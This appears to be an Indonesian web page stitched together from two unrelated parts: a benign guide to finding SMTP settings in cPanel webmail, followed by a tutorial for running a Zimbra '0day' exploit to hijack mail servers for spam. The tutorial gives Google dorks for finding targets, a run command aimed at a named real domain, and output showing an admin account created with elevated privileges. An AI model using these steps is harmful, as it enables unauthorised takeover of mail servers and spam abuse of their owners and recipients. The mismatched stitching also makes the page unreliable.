Hosting yang berbayar, rata-rata telah menggunakan cPanel (WHM) untuk
konfigurasi situs maupun hosting pelanggan. cPanel sangat memudahkan
dan memiliki banyak sekali fitur untuk keperluan manajemen situs.
Apabila pembaca menggunakan hosting yang memiliki akun cPanel, silahkan
ikuti langkah berikut untuk mendapatkan informasi Host dan Port SMTP :
Login melalui cPanel Pembaca
Pada dashboard atau halaman utama cPanel silahkan pilih WebMail
Pilih Webmail cPanelKemudian klik “Go to Secure WebMail Login”
Go to Secure Webmail LoginSetelah
masuk di halaman Mail Client Configuration, scroll down ke bawah dan
cari informasi Manual Setting. Dari bagian tersebut, terdapat informasi
mengenai outgoing server SMTP yang dapat pembaca pakai baik via SSL
maupun non-SSL.
Port SMTP cPanel HostingPembaca bisa menguji kedua mode autentikasi tersebut. Jika SSL untuk
akun hosting biasanya memakai setting SSL dari server yang dipakai oleh
pemilik hosting.
Selamat malam semua, :D saya akan membagi tutorial bagaimana mencari SMTP gretongan dengan 0day exploit :D
Pastinya sangan bergunna untuk method spam :v oke masuk aja ke topik :D Download Tools nya : Ruby22 Installer Zimbra Exploit Langkah Installasi dan cara exploit di cmd :
Instal ruby samapai selesai di program files c:\
Download Script Exploit nya
Setalah di download Extrax Scipt Exploit nya di file Ruby nya tadi
Extrax di file Ruby di folder Bin
Buka cmd
Jalan kan perintah nya
"cd c:\ruby\bin" *tanpakutip ( di bagian garis miring itu sesuaikan di mana kamu menyimpan Ruby nya tadi di mana
Untuk mencari target butuh dork zimbra, saya hanya ngasih 4 dork
inurl:"web client zimbra login" inurl:"powered by zimbra" inurl:"zimbra login" inurl:"zimbra mail"Untuk dork lain silahkan mencari dan mengembangkan dork sendiri
Copy dan Paste di cmd yang tadi sudah diberi perintah, c:/ruby/bin>ruby run.rb -tmail.kereta-api.co.id -u [username] -p [password]
Kemudian liat hasilnya
Jika sukses ada notice sepeti ini di cmd
[*]Looking if host is vuln.... [+] Host is vuln exploiting... [+] Obtaining Domain Name [+] Creating Account [+] Elevating Privileges Login : mail.kereta-api.co.id/zimbraAdmin/ Username : [username] Password : [password] Keterangan ComandLine : ========================================= -t = command ini Set target attack [korban] -u = command ini Set username [anda] -p = command ini Set password [anda] ========================================== Sekian yang dapat saya paparkan pada Malam ini selebihnya Tunggu update berikutnya :D Wassalamualaikum wr.wb